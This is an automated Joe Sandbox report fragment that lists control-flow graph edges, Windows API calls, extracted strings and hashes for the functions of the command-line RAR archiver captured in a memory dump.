138 API calls 39087->39154 39148 7ff629afa9d4 186 API calls wcschr 39088->39148 39092 7ff629af3c5c 39149 7ff629af93ac 8 API calls 39092->39149 39093 7ff629af3d10 39155 7ff629b118ac 39093->39155 39096 7ff629af3c66 39098 7ff629af3c77 39096->39098 39150 7ff629b0ca40 61 API calls _CxxThrowException 39096->39150 39151 7ff629af8090 8 API calls 39098->39151 39101 7ff629af3c7f 39101->39104 39152 7ff629b0ca40 61 API calls _CxxThrowException 39101->39152 39162 7ff629b3d400 48 API calls 39104->39162 39124 7ff629b11e95 setbuf 39123->39124 39125 7ff629b11ecb CreateFileW 39124->39125 39126 7ff629b11f59 GetLastError 39125->39126 39127 7ff629b11fb8 39125->39127 39128 7ff629b24534 10 API calls 39126->39128 39129 7ff629b11ff7 39127->39129 39131 7ff629b11fd9 SetFileTime 39127->39131 39130 7ff629b11f74 39128->39130 39133 7ff629b4a610 _handle_error 8 API calls 39129->39133 39130->39127 39132 7ff629b11f78 CreateFileW GetLastError 39130->39132 39131->39129 39132->39127 39134 7ff629b1203a 39133->39134 39134->39075 39163 7ff629b124e8 39135->39163 39138 7ff629b1240e 39138->39082 39141 7ff629b11c37 39140->39141 39142 7ff629b11c3b 39140->39142 39141->39074 39142->39141 39143 7ff629b11c5d 39142->39143 39180 7ff629b12d6c 12 API calls 2 library calls 39143->39180 39145->39081 39146->39085 39148->39092 39149->39096 39150->39098 39151->39101 39152->39104 39153->39087 39154->39093 39156 7ff629b118ca 39155->39156 39161 7ff629b118db 39155->39161 39157 7ff629b118d6 39156->39157 39158 7ff629b118de 39156->39158 39156->39161 39160 7ff629b11c24 12 API calls 39157->39160 39181 7ff629b11930 39158->39181 39160->39161 39161->39104 39169 7ff629b11af0 39163->39169 39166 7ff629b123f9 39166->39138 39168 7ff629b0ca40 61 API calls _CxxThrowException 39166->39168 39168->39138 39170 7ff629b11b01 setbuf 39169->39170 39171 7ff629b11b6f CreateFileW 39170->39171 39172 7ff629b11b68 39170->39172 39171->39172 39173 7ff629b11be1 39172->39173 39174 7ff629b24534 10 API calls 39172->39174 39177 7ff629b4a610 _handle_error 8 API 
calls 39173->39177 39175 7ff629b11bb3 39174->39175 39175->39173 39176 7ff629b11bb7 CreateFileW 39175->39176 39176->39173 39178 7ff629b11c14 39177->39178 39178->39166 39179 7ff629b0ca08 10 API calls 39178->39179 39179->39166 39180->39141 39182 7ff629b11964 39181->39182 39183 7ff629b1194c 39181->39183 39184 7ff629b11988 39182->39184 39187 7ff629b0c9d0 10 API calls 39182->39187 39183->39182 39185 7ff629b11958 FindCloseChangeNotification 39183->39185 39184->39161 39185->39182 39187->39184 39188 7ff629af82f0 39189 7ff629af8306 39188->39189 39198 7ff629af836f 39188->39198 39190 7ff629af8324 39189->39190 39194 7ff629af8371 39189->39194 39189->39198 39308 7ff629b12414 61 API calls 39190->39308 39192 7ff629af8347 39309 7ff629b11998 138 API calls 39192->39309 39194->39198 39310 7ff629b11998 138 API calls 39194->39310 39195 7ff629af835e 39197 7ff629b118ac 15 API calls 39195->39197 39197->39198 39211 7ff629afa410 39198->39211 39202 7ff629af8578 39203 7ff629afb540 147 API calls 39202->39203 39208 7ff629af858f 39203->39208 39204 7ff629afb540 147 API calls 39204->39202 39205 7ff629af8634 39206 7ff629b4a610 _handle_error 8 API calls 39205->39206 39207 7ff629af8663 39206->39207 39208->39205 39311 7ff629af9628 175 API calls 39208->39311 39312 7ff629b27a68 39211->39312 39214 7ff629af853a 39216 7ff629afb540 39214->39216 39221 7ff629afb55f setbuf 39216->39221 39217 7ff629afb5a1 39218 7ff629afb5d8 39217->39218 39219 7ff629afb5b8 39217->39219 39460 7ff629b28c1c 39218->39460 39346 7ff629afaba0 39219->39346 39221->39217 39342 7ff629afa4d0 39221->39342 39223 7ff629b4a610 _handle_error 8 API calls 39224 7ff629af854f 39223->39224 39224->39202 39224->39204 39225 7ff629afb67f 39226 7ff629afbc91 39225->39226 39227 7ff629afb6a5 39225->39227 39228 7ff629afbbae 39225->39228 39229 7ff629b12574 126 API calls 39226->39229 39306 7ff629afb5d3 39226->39306 39238 7ff629afb6b5 39227->39238 39257 7ff629afb79f 39227->39257 39227->39306 39230 7ff629b28d00 48 API calls 39228->39230 39229->39306 39233 
7ff629afbc5c 39230->39233 39529 7ff629b28d38 48 API calls 39233->39529 39237 7ff629afbc69 39530 7ff629b28d38 48 API calls 39237->39530 39238->39306 39494 7ff629b28d00 39238->39494 39240 7ff629afbc76 39531 7ff629b28d38 48 API calls 39240->39531 39242 7ff629afbc84 39532 7ff629b28d88 48 API calls 39242->39532 39247 7ff629afb726 39498 7ff629b28d38 48 API calls 39247->39498 39249 7ff629afb733 39250 7ff629afb749 39249->39250 39499 7ff629b28d88 48 API calls 39249->39499 39252 7ff629afb75c 39250->39252 39500 7ff629b28d38 48 API calls 39250->39500 39254 7ff629afb779 39252->39254 39256 7ff629b28d00 48 API calls 39252->39256 39501 7ff629b28f94 39254->39501 39256->39252 39258 7ff629afb8e5 39257->39258 39511 7ff629afc3c8 CharLowerW CharUpperW 39257->39511 39512 7ff629b3d840 WideCharToMultiByte 39258->39512 39262 7ff629afb9a1 39264 7ff629b28d00 48 API calls 39262->39264 39266 7ff629afb9c4 39264->39266 39265 7ff629afb910 39265->39262 39514 7ff629af945c 55 API calls _handle_error 39265->39514 39515 7ff629b28d38 48 API calls 39266->39515 39268 7ff629afb9d1 39516 7ff629b28d38 48 API calls 39268->39516 39270 7ff629afb9de 39517 7ff629b28d88 48 API calls 39270->39517 39272 7ff629afb9eb 39518 7ff629b28d88 48 API calls 39272->39518 39274 7ff629afba0b 39275 7ff629b28d00 48 API calls 39274->39275 39276 7ff629afba27 39275->39276 39519 7ff629b28d88 48 API calls 39276->39519 39278 7ff629afba37 39279 7ff629afba49 39278->39279 39520 7ff629b3bc48 15 API calls 39278->39520 39521 7ff629b28d88 48 API calls 39279->39521 39282 7ff629afba59 39283 7ff629b28d00 48 API calls 39282->39283 39284 7ff629afba66 39283->39284 39285 7ff629b28d00 48 API calls 39284->39285 39286 7ff629afba78 39285->39286 39522 7ff629b28d38 48 API calls 39286->39522 39288 7ff629afba85 39523 7ff629b28d88 48 API calls 39288->39523 39290 7ff629afba92 39291 7ff629afbacd 39290->39291 39524 7ff629b28d88 48 API calls 39290->39524 39526 7ff629b28e3c 39291->39526 39294 7ff629afbab2 39525 7ff629b28d88 48 API calls 39294->39525 39295 
                                                              Control-flow Graph (edge list of the IDA-exported graph not reproduced; the nodes reference API calls including SetFilePointer, GetLastError, GetStdHandle, WriteFile, SetLastError, WideCharToMultiByte, CharToOemA, CharLowerW, CharUpperW, GetFileTime, SetEvent, EnterCriticalSection, LeaveCriticalSection, WaitForSingleObject, GetCurrentProcessId, GetProcAddress, RtlReAllocateHeap, RtlPcToFileHeader, RaiseException, CompareStringA, snprintf, setbuf, memcpy_s and fflush)
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: *.%ls$*?.$+$7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tgz;xz;z;zip;zipx$EML$ERR$LOG$NUL$OFF$SFX$SND$VER$default.sfx$rar.log$stdin$stdin
                                                              • API String ID: 0-1628410872
                                                              • Opcode ID: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
                                                              • Instruction ID: 31e9027cd6d2d106dda7a59ce2525fddbb22c708e96e014bc1a4096a5a65803f
                                                              • Opcode Fuzzy Hash: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
                                                              • Instruction Fuzzy Hash: 01C2B322D0C1AEC1FF649E358A442BF2691AFC3786F548235CA0ECA6C5DE6DE544E352
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %s%s $.ext$exe$rar$sfx$,6$BK$q:
                                                              • API String ID: 0-1660254149
                                                              • Opcode ID: 7f8114fb2b18ce848bc72a4cfe25606c1bd699ff2abb5b225a9875a58ef852b8
                                                              • Instruction ID: 9c163d5aac781ec54cf19bba71fb2c797d462d399a85bd0affd03e62992b8e84
                                                              • Opcode Fuzzy Hash: 7f8114fb2b18ce848bc72a4cfe25606c1bd699ff2abb5b225a9875a58ef852b8
                                                              • Instruction Fuzzy Hash: 47E28A26A09BC689EF20DF25D8441EE37A1FB8678CF454036CE4D87A96DF3AD544E342

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: Library$Load$FileFreeModuleNameVersion
                                                              • String ID: rarlng.dll
                                                              • API String ID: 2520153904-1675521814
                                                              • Opcode ID: 49b096ca26b206715f71fd28137422a8c8958387befaadcb30f15fb4690b8ba1
                                                              • Instruction ID: 2c8255a89bfe3faab2d266a899f3fc0d42e4e2d2dee3da071197147916c14e1d
                                                              • Opcode Fuzzy Hash: 49b096ca26b206715f71fd28137422a8c8958387befaadcb30f15fb4690b8ba1
                                                              • Instruction Fuzzy Hash: 7531543161864ACAFF64DF22DC442EE2365FB87786F404135EA4D86A94DF3CE545E701

                                                              Control-flow Graph

                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(?,?,00000000,?,?,00007FF629B14620,?,00000000,?,00007FF629B37A8C), ref: 00007FF629B14736
                                                              • FindFirstFileW.KERNEL32(?,00000000,?,?,00007FF629B14620,?,00000000,?,00007FF629B37A8C), ref: 00007FF629B1476B
                                                              • GetLastError.KERNEL32(?,00000000,?,?,00007FF629B14620,?,00000000,?,00007FF629B37A8C), ref: 00007FF629B1477A
                                                              • FindNextFileW.KERNELBASE(?,?,00000000,?,?,00007FF629B14620,?,00000000,?,00007FF629B37A8C), ref: 00007FF629B147A4
                                                              • GetLastError.KERNEL32(?,00000000,?,?,00007FF629B14620,?,00000000,?,00007FF629B37A8C), ref: 00007FF629B147B2
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: FileFind$ErrorFirstLast$Next
                                                              • String ID:
                                                              • API String ID: 869497890-0
                                                              • Opcode ID: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
                                                              • Instruction ID: db3ee4502de70b846415e90bdd9b40482bd078b5fc4de4f9aa49bf6a06e38b45
                                                              • Opcode Fuzzy Hash: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
                                                              • Instruction Fuzzy Hash: 3B41B23260868A56EE249F25E8402EE63A1FB8B7B6F400331EA7D837C5DF7CE1559701
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: Crypt$Context$AcquireRandomRelease
                                                              • String ID:
                                                              • API String ID: 1815803762-0
                                                              • Opcode ID: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
                                                              • Instruction ID: c24bd14acace423395bbc7062d3f4dba0b1cfa07fadb13dae5db62da93c5226e
                                                              • Opcode Fuzzy Hash: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
                                                              • Instruction Fuzzy Hash: BE014B26B1865982EB008B16E94432EA761EBD6FD1F188031DE4D83B68CE79D946D700
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: Char
                                                              • String ID:
                                                              • API String ID: 751630497-0
                                                              • Opcode ID: 544a3eeab9b7365b5894b0fe2e19e3e09eeebdeb3bd711af898eb3b5dda5a90f
                                                              • Instruction ID: 224422440d2ccff53fd280542a50d8f3700f2ca2d604dde392bf2f82adbb2c42
                                                              • Opcode Fuzzy Hash: 544a3eeab9b7365b5894b0fe2e19e3e09eeebdeb3bd711af898eb3b5dda5a90f
                                                              • Instruction Fuzzy Hash: 4F22B032A0868696EF14DF30D8401FEBBB0FB91788F484039DA8D87699DF79E945D742
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ac23bd2f1d97dba6c8ed780cfc15edbe6b4d609a338b12ac683d3955c16e23e4
                                                              • Instruction ID: c5de04d2f3168d5c81b4c94fbe61b255968cff5a55972c154f20f827dc96be87
                                                              • Opcode Fuzzy Hash: ac23bd2f1d97dba6c8ed780cfc15edbe6b4d609a338b12ac683d3955c16e23e4
                                                              • Instruction Fuzzy Hash: 9F712732A0568946DB44DF26E8153EE7391F7CAF98F044139CB5CCB399DF38A051A7A0

                                                              Control-flow Graph: basic-block graph for the function starting at 7ff629b33ea8 (rendered graph and its executed/not-executed colouring not reproduced in text)
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: FileModuleNamesnprintfwcschr
                                                              • String ID: ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS$\
                                                              • API String ID: 602362809-1645646101
                                                              • Opcode ID: 13040d61f0e7da43208126d1082a5dded3eea02b21a4f98514b48b8c6faaa874
                                                              • Instruction ID: 8161c213a3807916885d82d8e2f9e4e9db2a875abd41e443791f49462544cdd8
                                                              • Opcode Fuzzy Hash: 13040d61f0e7da43208126d1082a5dded3eea02b21a4f98514b48b8c6faaa874
                                                              • Instruction Fuzzy Hash: 2122C322A1868A86EF20DF25DC402FF2361FF86785F814135EA4EC76D5EE2CE544E746

                                                              Control-flow Graph: basic-block graph for the function starting at 7ff629b04fd0 (rendered graph and its executed/not-executed colouring not reproduced in text)
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: wcschr
                                                              • String ID: .part$.rar$.rar$AFUMD$FUADPXETK$stdin
                                                              • API String ID: 1497570035-1281034975
                                                              • Opcode ID: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
                                                              • Instruction ID: aa73b7c0323c4aa3b414b6632a164384388990c6da47d0e8f1547e2e0cbc4ec8
                                                              • Opcode Fuzzy Hash: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
                                                              • Instruction Fuzzy Hash: F6C1B561A1C68A41EF24AF368E551FE2251EFC7B86F444135D94ECBADADE6CE500E303

                                                              Control-flow Graph: basic-block graph for the function starting at 7ff629b37f24 (rendered graph and its executed/not-executed colouring not reproduced in text)
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$CallerCurrentDirectoryProcessSystem
                                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                              • API String ID: 1389829785-2207617598
                                                              • Opcode ID: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
                                                              • Instruction ID: a6f110799d4c9c245db3dc7160ac68d1cb02eaf2a897cb33ed63e2d9b08d0a3e
                                                              • Opcode Fuzzy Hash: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
                                                              • Instruction Fuzzy Hash: 87416A21A08A8F92FE04CF22AD405BE6760BBDABD6F084135CC5D87B54DE6CE445A306

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
